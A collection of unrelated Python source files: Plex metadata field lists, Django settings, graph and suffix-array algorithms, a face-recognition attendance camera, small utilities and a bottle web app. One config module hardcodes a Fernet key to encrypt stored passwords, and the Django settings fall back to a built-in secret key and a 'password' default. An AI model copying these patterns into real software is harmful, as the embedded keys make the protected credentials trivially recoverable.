('Video Stream Level', 'Media/Part/Stream[@streamType=1]/@level'),
('Audio Stream Selected',
'Media/Part/Stream[@streamType=2]/@selected'),
('Audio Stream Default',
'Media/Part/Stream[@streamType=2]/@default'),
('Audio Stream Codec',
'Media/Part/Stream[@streamType=2]/@codec'),
('Audio Stream Index',
'Media/Part/Stream[@streamType=2]/@index'),
('Audio Stream Channels',
'Media/Part/Stream[@streamType=2]/@channels'),
('Audio Stream Bitrate',
'Media/Part/Stream[@streamType=2]/@bitrate'),
('Audio Stream Language',
'Media/Part/Stream[@streamType=2]/@language'),
('Audio Stream Language Code',
'Media/Part/Stream[@streamType=2]/@languageCode'),
('Audio Stream Audio Channel Layout',
'Media/Part/Stream[@streamType=2]/@audioChannelLayout'),
('Audio Stream Bit Depth',
'Media/Part/Stream[@streamType=2]/@bitDepth'),
('Audio Stream Bitrate Mode',
'Media/Part/Stream[@streamType=2]/@bitrateMode'),
('Audio Stream Codec ID',
'Media/Part/Stream[@streamType=2]/@codecID'),
('Audio Stream Duration',
'Media/Part/Stream[@streamType=2]/@duration'),
('Audio Stream Profile',
'Media/Part/Stream[@streamType=2]/@profile'),
('Audio Stream Sampling Rate',
'Media/Part/Stream[@streamType=2]/@samplingRate'),
('Audio Stream Required Bandwidths',
'Media/Part/Stream[@streamType=2]/@requiredBandwidths'),
('Subtitle Stream Codec',
'Media/Part/Stream[@streamType=3]/@codec'),
('Subtitle Stream Index',
'Media/Part/Stream[@streamType=3]/@index'),
('Subtitle Stream Language',
'Media/Part/Stream[@streamType=3]/@language'),
('Subtitle Stream Language Code',
'Media/Part/Stream[@streamType=3]/@languageCode'),
('Subtitle Stream Codec ID',
'Media/Part/Stream[@streamType=3]/@codecID'),
('Subtitle Stream Format',
'Media/Part/Stream[@streamType=3]/@format'),
('Subtitle Stream Title',
'Media/Part/Stream[@streamType=3]/@title'),
('Subtitle Stream Selected',
'Media/Part/Stream[@streamType=3]/@selected'),
('Subtitle Stream Required Bandwidths',
'Media/Part/Stream[@streamType=3]/@requiredBandwidths'),
('Subtitle Header Compression',
'Media/Part/Stream[@streamType=3]/@headerCompression')
]
# Define rows and element name for extreme level 7 (One call pr. movie)
Level_7 = [
]
# Define rows and element name for extreme level 8 (One call pr. movie)
Level_8 = [
]
# Define rows and element name for extreme level 9 (One call pr. movie)
Level_9 = [
]
# Define rows and element name for level 666 (Two calls pr. movie)
Level_666 = [
# ('PMS Media Path' , 'hash') # Field auto added
# ('PMS Metadata Path' , 'SHA1') # Field auto added
]
# Define rows and element name for Special level 1 (one call pr. movie)
SLevel_1 = [
('Title',
'@title'),
('Year',
'@year'),
('Release Date',
'@originallyAvailableAt'),
('Audio Languages',
'Media/Part/Stream[@streamType=2]/@languageCode')
]
# Define rows and element name for Special level 2 (one call pr. movie)
SLevel_2 = [
('Title',
'@title'),
('Audio Stream Language',
'Media/Part/Stream[@streamType=2]/@language'),
('Audio Title',
'Media/Part/Stream[@streamType=2]/@title'),
('Container',
'Media/@container'),
('Part File',
'Media/Part/@file'),
('Audio Stream Index',
'Media/Part/Stream[@streamType=2]/@index'),
('Audio Stream Language Code',
'Media/Part/Stream[@streamType=2]/@languageCode')
]
# Define rows and element name for Special level 3 (one call pr. movie)
SLevel_3 = [
('Media ID',
'@ratingKey'),
('Rating',
'@rating'),
('Title',
'@title'),
('Year',
'@year'),
('Genres',
'Genre/@tag'),
('Country',
'Country/@tag'),
('Directors',
'Director/@tag'),
('Summary',
'@summary'),
('Subtitle Languages',
'Media/Part/Stream[@streamType=3]/@languageCode'),
('Subtitle Codec',
'Media/Part/Stream[@streamType=3]/@codec'),
('Subtitle Forced',
'Media/Part/Stream[@streamType=3]/@forced'),
('Video Resolution',
'Media/@videoResolution'),
('Bitrate',
'Media/@bitrate'),
('Audio Codec',
'Media/@audioCodec'),
('Video Codec',
'Media/@videoCodec'),
('Container',
'Media/@container'),
('MetaDB Link',
'@guid')
]
# Define rows and element name for Special level 666 (two calls pr. movie)
SLevel_666 = [
]
# Define rows and element name for Special level 666_2 (two calls pr. movie)
SLevel_666_2 = [
]
# Define rows and element name for PlayCount 1 (one call pr. movie)
PlayCount_1 = [
('Media ID',
'@ratingKey'),
('Title',
'@title'),
('Total Playcount',
None),
('Added',
'@addedAt'),
('File Path',
'Media/Part/@file')
]
|
"""
Copyright © retnikt <[email protected]> 2020
This software is licensed under the MIT Licence: https://opensource.org/licenses/MIT
"""
from typing import TypedDict, cast
__all__ = ["NAME", "VERSION", "URL", "LICENCE", "LICENSE"]
class _Licence(TypedDict):
name: str
url: str
class _Author(TypedDict):
name: str
url: str
email: str
NAME: str = "Notebook"
VERSION: str = "0.1.0"
URL: str = "https://github.com/retnikt/notebook#readme"
LICENCE: _Licence = {
"name": "MIT",
"url": "https://opensource.org/licenses/mit-license.html",
}
class _MisspeltLicence: # pragma: no cover
"""descriptor to teach 330 million people how to spell licence."""
def __get__(self, instance, owner) -> str:
raise SyntaxError("learn to spell!")
LICENSE: str = cast(str, _MisspeltLicence())
|
"""
Django settings for back project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
import sys
from pathlib import Path
def get_from_env_or_file(var_name, default=None):
file_var_name = '%s_FILE' % var_name
path = os.environ.get(file_var_name)
if path and os.path.isfile(path):
with open(path, 'r') as f:
return f.read()
else:
return os.environ.get(var_name, default)
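# Usage sketch (illustrative comment, not in the original settings): with
# DJANGO_SECRET_KEY_FILE=/run/secrets/django_secret_key exported, the helper
# above returns the file's contents; otherwise it falls back to the plain
# DJANGO_SECRET_KEY environment variable, and finally to the given default.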
TEST = 'test' in sys.argv
COLLECTSTATIC = 'collectstatic' in sys.argv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = get_from_env_or_file(
'DJANGO_SECRET_KEY',
'django-insecure-f)63a8(q@ykri+c1)=*y@5ma!ox%%@1dlgi2e@!v$952hlcdgx')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DJANGO_DEBUG', '').lower() == 'true'
ALLOWED_HOSTS = [
s.strip() for s in os.getenv(
'DJANGO_ALLOWED_HOSTS', '.shanty.social').split(',')
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'django_celery_beat',
'djcelery_email',
'mail_templated',
'powerdns',
'rest_framework',
'drf_recaptcha',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'xff.middleware.XForwardedForMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
if DEBUG:
MIDDLEWARE.insert(2, 'whitenoise.middleware.WhiteNoiseMiddleware')
ROOT_URLCONF = 'back.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'back.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DJANGO_DB_PASSWORD = get_from_env_or_file('DJANGO_DB_PASSWORD', 'password')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DJANGO_DB_HOST', 'db'),
'NAME': os.environ.get('DJANGO_DB_NAME', 'shanty'),
'USER': os.environ.get('DJANGO_DB_USER', 'user'),
'PASSWORD': DJANGO_DB_PASSWORD,
}
}
REDIS_HOST = os.getenv('DJANGO_REDIS_HOST', 'website-redis')
REDIS_PORT = int(os.getenv('DJANGO_REDIS_PORT', '6379'))
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': f'redis://{REDIS_HOST}:{REDIS_PORT}/1',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.'
'UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = Path(BASE_DIR).joinpath('api', 'static')
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTH_USER_MODEL = 'api.User'
SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'
CELERY_BROKER_URL = os.environ.get(
'CELERY_BROKER_URL', f'redis://{REDIS_HOST}:{REDIS_PORT}/0')
CELERY_RESULT_BACKEND = CELERY_BROKER_URL
CELERY_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_BEAT_SCHEDULER = os.environ.get(
'CELERY_BEAT_SCHEDULER',
'django_celery_beat.schedulers:DatabaseScheduler')
CELERY_COMMAND = ('celery', '-A', 'back', 'worker', '-l', 'info')
CELERY_AUTORELOAD = DEBUG
CELERY_ALWAYS_EAGER = TEST
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'api.oauth.OAuth2Authentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
)
}
EMAIL_BACKEND = os.environ.get(
'DJANGO_EMAIL_BACKEND', 'django.core.mail.backends.console.EmailBackend')
CELERY_EMAIL_BACKEND = 'django_mailjet.backends.MailjetBackend'
MAILJET_API_KEY = get_from_env_or_file('DJANGO_MAILJET_API_KEY', None)
MAILJET_API_SECRET = get_from_env_or_file('DJANGO_MAILJET_API_SECRET', None)
DEFAULT_FROM_EMAIL = '[email protected]'
EMAIL_CONFIRM_DAYS = 7
ACME_DIRECTORY_URL = 'http://pebble/'
ACME_KEY_BITS = 2048
ACME_PKEY_BITS = 2048
ADMIN_ENABLED = False
FIXTURE_DIRS = [
Path(BASE_DIR).joinpath('api', 'fixtures'),
]
DRF_RECAPTCHA_TESTING = TEST
DRF_RECAPTCHA_SECRET_KEY = get_from_env_or_file(
'DJANGO_RECAPTCHA_SECRET_KEY', None)
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
XFF_TRUSTED_PROXY_DEPTH = 1
XFF_NO_SPOOFING = True
AUTHLIB_OAUTH2_PROVIDER = {
'refresh_token_generator': True,
}
AUTHLIB_JWK = os.getenv('AUTHLIB_JWK', '/run/secrets/jwk')
AUTHLIB_JWK_PUB = os.getenv('AUTHLIB_JWK_PUB', '/run/secrets/jwk.pub')
AUTHLIB_OPENIDC_METADATA = {
"issuer": "http://shanty.social/",
"authorization_endpoint": "http://www.shanty.local:8000/api/oauth2/"
"authorize/",
"device_authorization_endpoint": "http://www.shanty.local:8000/api/oauth2/"
"device/code",
"token_endpoint": "http://www.shanty.local:8000/api/oauth2//token",
"userinfo_endpoint": "http://www.shanty.local:8000/api/users/whoami/",
"revocation_endpoint": "http://www.shanty.local:8000/api/oauth2/revoke",
"jwks_uri": "http://www.shanty.local:8000/api/oauth2/jwks/",
"response_types_supported": [
"code",
"token",
"id_token",
"code token",
"code id_token",
"token id_token",
"code token id_token",
"none"
],
"subject_types_supported": [
"public"
],
"id_token_signing_alg_values_supported": [
"RS256"
],
"scopes_supported": [
"openid",
"email",
"profile"
],
"token_endpoint_auth_methods_supported": [
"client_secret_post",
"client_secret_basic"
],
"claims_supported": [
"aud",
"email",
"email_verified",
"exp",
"family_name",
"given_name",
"iat",
"iss",
"locale",
"name",
"picture",
"sub"
],
"code_challenge_methods_supported": [
"plain",
"S256"
],
"grant_types_supported": [
"authorization_code",
"refresh_token",
"urn:ietf:params:oauth:grant-type:device_code",
"urn:ietf:params:oauth:grant-type:jwt-bearer"
]
}
SHARED_DOMAINS = os.getenv(
'DJANGO_SHARED_DOMAINS', 'shanty.social').split(',')
NAME_SERVERS = os.getenv(
'DJANGO_NAME_SERVERS', '1.1.1.1,8.8.8.8').split(',')
if COLLECTSTATIC:
STATICFILES_STORAGE = \
'compress_staticfiles.storage.CompressStaticFilesStorage'
BROTLI_STATIC_COMPRESSION = False
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'django.server': {
'()': 'django.utils.log.ServerFormatter',
'format': '[%(server_time)s] %(message)s',
}
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'console_debug_false': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'logging.StreamHandler',
},
'django.server': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'django.server',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console', 'console_debug_false', 'mail_admins'],
'level': 'INFO',
},
'django.server': {
'handlers': ['django.server'],
'level': 'INFO',
'propagate': False,
}
}
}
SSH_HOST_KEYS = os.getenv('SSH_HOST_KEYS', '/run/secrets/ssh_host_*_key.pub')
|
def partition(graph, source):
"""
The function partitions a graph into two sets if bi-partite partitioning is possible
otherwise returns 'None'
"""
visited = dict()
for node in graph:
visited[node] = False
one = set()
two = set()
flag = True
queue1 = list()
queue2 = list()
queue1.append(source)
while len(queue1) > 0 or len(queue2) > 0:
if flag:
if len(queue1) != 0:
current = queue1.pop(0)
one.add(current)
## if current not in one:
## one.add(current)
## else:
## return None
else:
flag = not flag
continue
else:
if len(queue2) != 0:
current = queue2.pop(0)
two.add(current)
## if current not in two:
## two.add(current)
## else:
## return None
else:
flag = not flag
continue
visited[current] = True
adjacent = graph[current]
trimmed = [x for x in adjacent if not visited[x]]
if flag:
queue2 += trimmed
else:
queue1 += trimmed
flag = not flag
if len(one & two) == 0:
return (one, two)
else:
return None
g = {'a' : set('b'), 'b' : set('a')}
print(partition(g, 'a'))
h = {1 : set([4, 5]), 2 : set([4]), 3 : set([5, 6]), 4 : set([1, 2]), 5 : set([1, 3]), 6 : set([3])}
print(partition(h, 5))
i = {1 : set([4, 5]), 2 : set([3, 4]), 3 : set([2, 5, 6]), 4 : set([1, 2]), 5 : set([1, 3]), 6 : set([3])}
print(partition(i, 1))
|
from application import db
# class id(db.Model):
# id = db.Column(db.Integer, primary_key=True)
|
import pickle
from typing import Dict
from datetime import date as dt
import cv2
import imutils
import numpy as np
import face_recognition
from src.settings import (
DLIB_MODEL, DLIB_TOLERANCE,
ENCODINGS_FILE
)
from src.libs.base_camera import BaseCamera
from src.models import StudentModel, AttendanceModel
class RecognitionCamera(BaseCamera):
video_source = 0
# this class variable will help to process every other frame of video to save time
process_this_frame = True
@classmethod
def set_video_source(cls, source):
cls.video_source = source
@classmethod
def frames(cls):
print("[INFO] starting video stream...")
camera = cv2.VideoCapture(cls.video_source)
# store input video stream in camera variable
if not camera.isOpened():
raise RuntimeError('Could not start camera.')
print("[INFO] loading encodings...")
        with open(ENCODINGS_FILE, "rb") as encodings_file:
            data = pickle.loads(encodings_file.read())
# print(len(data['encodings']) == len(data['ids']))
        # create a dictionary of known students (loaded from the database once) to avoid repeated queries
known_students = {}
while True:
# read current frame
_, img = camera.read()
yield cls.recognize_n_attendance(img, data, known_students)
@classmethod
def recognize_n_attendance(cls, frame: np.ndarray,
data: Dict, known_students: Dict) -> bytes:
# convert the input frame from BGR to RGB then resize it to have
# a width of 750px (to speedup processing)
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
rgb = imutils.resize(rgb_frame, width=750)
r = frame.shape[1] / float(rgb.shape[1])
boxes = []
encodings = []
names = []
# Only process every other frame of video to save time
if cls.process_this_frame:
# detect the (x, y)-coordinates of the bounding boxes
# corresponding to each face in the input frame, then compute
# the facial embeddings for each face
boxes = face_recognition.face_locations(rgb, model=DLIB_MODEL)
encodings = face_recognition.face_encodings(rgb, boxes)
# loop over the facial embeddings
for encoding in encodings:
# attempt to match each face in the input image to our known encodings
matches = face_recognition.compare_faces(data["encodings"], encoding, DLIB_TOLERANCE)
# name to be displayed on video
display_name = "Unknown"
# check to see if we have found a match
if True in matches:
# find the indexes of all matched faces then initialize a
# dictionary to count the total number of times each face
# was matched
matched_indexes = [i for (i, b) in enumerate(matches) if b]
counts = {}
# loop over the matched indexes and maintain a count for
# each recognized face
for matched_index in matched_indexes:
_id = data["ids"][matched_index]
counts[_id] = counts.get(_id, 0) + 1
# determine the recognized face with the largest number
# of votes (note: in the event of an unlikely tie Python
# will select first entry in the dictionary)
_id = max(counts, key=counts.get)
if _id:
if _id in known_students.keys():
# find matched student in the known_students by id
student = known_students[_id]
else:
# find matched student in the database by id
student = StudentModel.find_by_id(_id)
known_students[_id] = student
# if student's attendance is not marked
if not AttendanceModel.is_marked(dt.today(), student):
# then mark student's attendance
student_attendance = AttendanceModel(student=student)
# commit changes to database
student_attendance.save_to_db()
# update displayed name to student's name
display_name = student.name
# append the name to be displayed in names list
names.append(display_name)
cls.process_this_frame = not cls.process_this_frame
# loop over the recognized faces
for ((top, right, bottom, left), display_name) in zip(boxes, names):
if display_name == "Unknown":
continue
# rescale the face coordinates
top = int(top * r)
right = int(right * r)
bottom = int(bottom * r)
left = int(left * r)
top_left = (left, top)
bottom_right = (right, bottom)
# draw the predicted face name on the image
cv2.rectangle(frame, top_left, bottom_right, (0, 255, 0), 2)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(frame, display_name, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)
# display the output frames to the screen
return cv2.imencode('.jpg', frame)[1].tobytes()
|
from django.urls import path
from rest_framework.routers import SimpleRouter
from accounts.views import CreateUserView, LoginUserView
router = SimpleRouter()
router.register("accounts", CreateUserView)
urlpatterns = [
path("login/", LoginUserView.as_view()),
]
urlpatterns += router.urls
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Dataset conversion script
Author: Gertjan van den Burg
"""
import json
import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-s",
"--subsample",
help="Number of observations to skip during subsampling",
type=int,
)
parser.add_argument("input_file", help="File to convert")
parser.add_argument("output_file", help="File to write to")
return parser.parse_args()
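# Input format assumed by main() below (inferred from the parsing code, noted
# here for clarity): a tab-separated text file with one "year<TAB>population"
# pair per line, which is converted into the JSON time-series structure
# written to the output file.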
def main():
args = parse_args()
with open(args.input_file, "r") as fp:
rows = [l.strip().split("\t") for l in fp]
time = []
values = []
for year, pop in rows:
time.append(year)
values.append(int(pop))
name = "centralia"
longname = "Centralia Pennsylvania Population"
time_fmt = "%Y"
series = [{"label": "Population", "type": "int", "raw": values}]
data = {
"name": name,
"longname": longname,
"n_obs": len(time),
"n_dim": len(series),
"time": {
"type": "string",
"format": time_fmt,
"index": list(range(len(time))),
"raw": time,
},
"series": series,
}
with open(args.output_file, "w") as fp:
json.dump(data, fp, indent="\t")
if __name__ == "__main__":
main()
|
from typing import List
import collections
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
trees = collections.defaultdict()
trees.default_factory = trees.__len__
count = collections.Counter()
ans = []
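        # Descriptive note (added for clarity): each distinct subtree shape is
        # assigned a small integer uid via the defaultdict keyed by
        # (value, left uid, right uid); a Counter tracks how often each uid is
        # seen, and a subtree's root is appended to the answer exactly once,
        # when its count reaches 2.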
def lookup(node):
if node:
key = node.val, lookup(node.left), lookup(node.right)
uid = trees[key]
print(f'{key} => {uid}')
count[uid] += 1
if count[uid] == 2:
ans.append(node)
return uid
lookup(root)
return ans
import sys, os
sys.path.append(os.path.abspath('../TreeUtil'))
from util import drawtree , deserialize
root = deserialize('[1,2,3,4,null,2,4,null,null,4,null]')
# drawtree(root)
s = Solution()
a = s.findDuplicateSubtrees(root)
print(f'ans = {a}')
|
# Copyright (c) 2021, Stanford University
"""Tests for peak finder."""
import numpy as np
import pandas as pd
from util import peak_finder
from dataclasses import dataclass
from skimage.filters import gaussian
@dataclass()
class Point:
"""A class for defining a point in 3D."""
x: int
y: int
z: int
w: float
def test_peak_finder():
"""Test peak finder."""
x = np.zeros((20, 30, 30))
points = [
Point(5, 7, 4, 3000),
Point(10, 12, 10, 2000),
]
gt_df = pd.DataFrame(columns=["z", "y", "x"])
for i, p in enumerate(points):
x[p.z, p.y, p.x] = p.w
gt_df.loc[i] = [float(p.z), float(p.y), float(p.x)]
x = np.expand_dims(
gaussian(
x,
sigma=1.0,
),
axis=0,
)
est_df = peak_finder.peak_finder(
x, diameter=3, threshold=0, n_processes=1, preprocess=False
)
est_df = est_df.drop(
["mass", "size", "ecc", "signal", "ep", "frame", "raw_mass"], axis=1
).sort_values(by=["x"])
pd.testing.assert_frame_equal(gt_df, est_df, check_exact=False)
|
#!/usr/bin/env python
########################################################################
# FastGeneralizedSuffixArrays v0.1 #
# (c) 2011 Mark Mazumder #
# markmaz.com #
########################################################################
class Triple(object):
"""Represent each sortable character in R with three integers"""
#todo: input validation, errors
def __init__(self, T, idx, length):
t_i = lambda i: T[i] if i < length else 0
self._triple = (t_i(idx), t_i(idx + 1), t_i(idx + 2))
self._index = idx
self._rank = None
self._rpos = None
@property
def triple(self):
"""Character for R_k strings"""
return self._triple
@property
def index(self):
"""Position of R_k character in source string"""
return self._index
@property
def rpos(self):
"""Sorted order of R_k charcter"""
return self._rpos
@rpos.setter
def rpos(self, pos):
self._rpos = pos
@property
def rank(self):
"""Sorted order of R_k charcter"""
return self._rank
@rank.setter
def rank(self, pos):
self._rank = pos
def __repr__(self):
return "Triple({0}, {1}, {2})".format(self.triple, self.index, self.rank)
class NonsamplePair(object):
#todo: property decorators for validation
def __init__(self, T, idx, S_i_ranks):
self.index = idx
self.pair = None
max_index = len(T)
if idx < max_index:
self.pair = (T[self.index], S_i_ranks[self.index + 1])
else:
self.pair = (0, S_i_ranks[self.index + 1]) #defined to be 0 by KS algorithm
# Recursive Karkkainen-Sanders implementation
# Input: list of integers (representing characters)
# Returns suffix array for list
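# Example (hedged sketch, not part of the original file): for T built from the
# character codes of "banana", ksa(T) is expected to return
# [6, 5, 3, 1, 0, 4, 2] -- the empty suffix at index len(T) is included because
# the algorithm treats position n as the terminating 0 character.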
def ksa(T):
length = len(T) # n
# B_k = { i \in [0,n] | i mod 3 = k }
B_0, B_1, B_2 = xrange(0, length+1, 3), xrange(1, length+1, 3), xrange(2, length+1, 3)
#karkkainen-sanders step 1: sort sample suffixes
R_0 = [ Triple(T, idx, length) for idx in B_0 ]
R_1 = [ Triple(T, idx, length) for idx in B_1 ]
R_2 = [ Triple(T, idx, length) for idx in B_2 ]
R = R_1 + R_2
#enable reverse-lookup of characters in R from a list of sorted characters from R
for i, r_char in enumerate(R):
r_char.rpos = i
sorted_suffixes_R = sorted(R, key=lambda suffix_char: suffix_char.triple)
#Enables 0 as unique terminating character by starting ranks at 1
def rank_suffixes(suffixes, rank=1):
for i, suffix in enumerate(suffixes):
if i > 0 and suffix.triple != suffixes[i-1].triple:
rank += 1
suffix.rank = rank
return rank
rank = rank_suffixes(sorted_suffixes_R)
R_prime = [suffix.rank for suffix in R]
#recursive call
if (rank < len(R)): #we had repeats of characters of R, make a recursive call to sort
R_prime_suffix_array = ksa(R_prime)
else:
#directly form suffix array
R_prime_suffix_array = [len(R)] + [suffix.rpos for suffix in sorted_suffixes_R]
    rank_Si = [None] * (length + 3) # why plus 3? -> additionally define rank(S_(n+1)) = rank(S_(n+2)) = 0
rank_Si[-2] = rank_Si[-1] = 0
#build rank(S_i) lookup array
for i, SAi in enumerate(R_prime_suffix_array):
if SAi < len(R): #ignore the index pointing to the terminating character of R_prime
rank_Si[R[SAi].index] = i
sorted_suffixes_R = [R[i] for i in R_prime_suffix_array[1:]]
#karkkainen-sanders step 2: sort nonsample suffixes
nonsample_suffix_pairs = [NonsamplePair(T, idx, rank_Si) for idx in B_0]
sorted_nonsample_suffix_pairs = sorted(nonsample_suffix_pairs, key=lambda p: p.pair)
#karkkainen-sanders step 3: merge
cur_Sc, cur_Sb0 = 0, 0
objs_SA = []
def getT(idx):
if idx < len(T):
return T[idx]
return 0
while cur_Sc < len(sorted_suffixes_R) and cur_Sb0 < len(sorted_nonsample_suffix_pairs):
i = sorted_suffixes_R[cur_Sc].index
j = sorted_nonsample_suffix_pairs[cur_Sb0].index
if i % 3 == 1: #i in B_1
            # S_i <= S_j iff (T[i], rank(S_(i+1))) <= (T[j], rank(S_(j+1)))
if (getT(i), rank_Si[i+1]) < (getT(j), rank_Si[j+1]):
objs_SA.append(sorted_suffixes_R[cur_Sc])
cur_Sc += 1
else:
objs_SA.append(sorted_nonsample_suffix_pairs[cur_Sb0])
cur_Sb0 += 1
else: #i in B_2
if (getT(i), getT(i+1), rank_Si[i+2]) < (getT(j), getT(j+1), rank_Si[j+2]):
objs_SA.append(sorted_suffixes_R[cur_Sc])
cur_Sc += 1
else:
objs_SA.append(sorted_nonsample_suffix_pairs[cur_Sb0])
cur_Sb0 += 1
objs_SA += sorted_suffixes_R[cur_Sc:]
objs_SA += sorted_nonsample_suffix_pairs[cur_Sb0:]
SA = [suffix_object.index for suffix_object in objs_SA]
return SA
import sys
def main():
def inputerr():
print 'usage: python sa.py input_alphanumeric_string'
exit()
if len(sys.argv) != 2:
inputerr()
T = sys.argv[1].strip()
#if not T.isalnum():
# inputerr()
myT = []
for chr in T:
myT.append(ord(chr))
sa = ksa(myT)
print T
print ["{0:^2}".format(chr) for chr in T]
print ["{0:^2}".format(i) for i, chr in enumerate(T)]
print sa
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
import json, os
from cryptography.fernet import Fernet
key= b'FpOza5rnPiW1Jv1oJzF6Ef0LitGrZ2nyQcPCG5kYmFc='
fernet = Fernet(key)
def isConfig(path='config.json'):
return os.path.isfile(path)
def getConfig(path='config.json'):
if isConfig(path):
        with open(path, 'r') as configFile:
            configContent = configFile.read()
configValues = json.loads(configContent)
if not 'myRoom' in configValues:
configValues['myRoom'] = None
if not 'myUsername' in configValues:
configValues['myUsername'] = None
if not 'myPassword' in configValues:
configValues['myPassword'] = None
if not 'myName' in configValues:
configValues['myName'] = None
        # TODO: add the remaining keys
if type(configValues['myPassword']) is str:
configValues['myPassword'] = fernet.decrypt(configValues['myPassword'].encode()).decode()
return configValues
else:
        return { 'myRoom': None, 'myUsername': None, 'myPassword': None, 'myName': None }  # TODO: add the remaining keys
def setConfig(configValues, path='config.json'):
if type(configValues['myPassword']) is str:
configValues['myPassword'] = fernet.encrypt(configValues['myPassword'].encode()).decode()
configContent = json.dumps(configValues)
    with open(path, 'w') as configFile:
        configFile.write(configContent)
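# Round-trip sketch (illustrative, not part of the original module):
#   cfg = getConfig()                 # {'myRoom': None, ...} on first run
#   cfg['myPassword'] = 'secret'
#   setConfig(cfg)                    # writes config.json, password Fernet-encrypted
#   getConfig()['myPassword']         # -> 'secret' again (decrypted on read)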
|
import base64
import bottle
import os
import random
import time
from bottle import run, template, error, route, request, abort, static_file
from pymongo import Connection, errors
from pymongo.errors import ConnectionFailure
from utils.utils import get_domain
while True:
try:
connection = Connection(
os.environ.get('MONGODB_HOST', 'localhost'),
            int(os.environ.get('MONGODB_PORT', 27017)),
)
db = connection.mydatabase
break
except ConnectionFailure:
time.sleep(5)
ENVIRONMENT = os.environ.get('ENVIRONMENT', 'DEVELOPMENT')
@route('/api/random-generate/', method='GET')
def random_generate():
categories = [
'Amore', 'Soldi', 'Amici', 'Sport', 'Salute', 'Motto'
]
response_dict = {
"objects" : [],
"slug" : []
}
slug = ""
for category in categories:
entities = db['documents'].find({'Categoria':category})
count = db['documents'].find({'Categoria':category}).count()
n_random = random.randint(1,count)
i = 0
for entity in entities:
entity_random = entity
i = i + 1
if i == n_random:
break
slug = slug + "_" + str(entity_random["_id"])
response_dict["objects"].append({
"Categoria" : entity_random["Categoria"],
"Testo" : entity_random["Testo"],
})
response_dict["slug"] = base64.standard_b64encode(slug[1:].encode()).decode('UTF-8')
return response_dict
@route('/')
def index():
cta = [
'Escimi i buoni propositi',
'Generali adesso!',
'Iniziamo!',
'Vai!'
]
n_random = random.randint(0, 3)
cta_random = cta[n_random]
currentUrl = format(request.url)
domain = get_domain(currentUrl)
return template(
'views/index.tpl',
title="Homepage",
cta_random=cta_random,
domain=domain,
currentUrl = currentUrl
)
@route('/robots.txt')
def robotstxt():
from bottle import response
response.content_type = 'text/plain;'
return template(
'views/robots.tpl',
disallow='/' if ENVIRONMENT != "PRODUCTION" else ''
)
